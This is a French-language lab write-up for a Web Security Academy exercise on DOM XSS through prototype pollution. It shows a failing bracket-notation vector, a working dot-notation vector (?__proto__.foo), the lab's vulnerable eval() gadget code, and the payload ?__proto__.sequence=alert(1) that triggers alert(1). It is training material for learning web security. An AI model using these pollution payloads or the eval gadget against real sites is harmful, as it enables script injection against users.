DOM XSS via un vecteur alternatif de prototype pollution

DOM XSS via an alternative prototype pollution vector

Lab: DOM XSS via an alternative prototype pollution vector | Web Security AcademyWebSecAcademy

Contexte du lab

L’application exécute du JavaScript côté navigateur et construit certains objets à partir des paramètres d’URL. Le but est de polluer Object.prototype (donc d’injecter une propriété qui sera héritée par d’autres objets), puis de trouver un “gadget” dans le code qui réutilise cette propriété d’une façon dangereuse (ici via eval), afin d’exécuter alert().

Analyse de la source de pollution

Test initial (non fonctionnel)

Le premier test consiste à injecter une propriété via l’URL :

/?__proto__[foo]=bar

Après vérification dans la console :

console.log({}.foo)

Le résultat est undefined, et aucune propriété n’apparaît dans Object.prototype.

Conclusion : le parseur de paramètres utilisé par l’application ne traite pas la notation avec crochets pour __proto__.

Object.prototype

Vecteur alternatif fonctionnel

En utilisant une notation avec un point :

?__proto__.foo=bar

Cette fois-ci :

console.log({}.foo)

Retourne bien bar.

La pollution de Object.prototype fonctionne avec ce format, ce qui indique que le parseur accepte la notation __proto__.clé.

Identification du gadget

Le fichier searchLoggerAlternative.js contient le code suivant :

async function logQuery(url, params) {
    try {
        await fetch(url, {method: "post", keepalive: true, body: JSON.stringify(params)});
    } catch(e) {
        console.error("Failed storing query");
    }
}

async function searchLogger() {
    window.macros = {};
    window.manager = {params: $.parseParams(new URL(location)), macro(property) {
            if (window.macros.hasOwnProperty(property))
                return macros[property]
        }};
    let a = manager.sequence || 1;
    manager.sequence = a + 1;

    eval('if(manager && manager.sequence){ manager.macro('+manager.sequence+') }');

    if(manager.params && manager.params.search) {
        await logQuery('/logger', manager.params);
    }
}

window.addEventListener("load", searchLogger);

Points clés :

manager.sequence peut être hérité depuis Object.prototype.
Sa valeur est intégrée directement dans une chaîne passée à eval().
Aucune validation n’est effectuée sur le type ou le contenu.

eval() constitue donc un gadget exploitable.

Exploitation

On pollue la propriété sequence sur le prototype global :

?__proto__.sequence=alert(1) -

Déroulement :

manager.sequence récupère la valeur polluée depuis Object.prototype.
L’opération a + 1 transforme la chaîne en alert(1) -1.
Cette valeur est injectée dans la chaîne exécutée par eval().

Résultat :

alert(1) est exécuté au chargement de la page.
Le DOM XSS est déclenché avec succès.

Mis à jour il y a 1 mois

hashtagDOM XSS via an alternative prototype pollution vector

hashtagContexte du lab

hashtagAnalyse de la source de pollution

hashtagIdentification du gadget

hashtagExploitation

DOM XSS via an alternative prototype pollution vector

Contexte du lab

Analyse de la source de pollution

Identification du gadget

Exploitation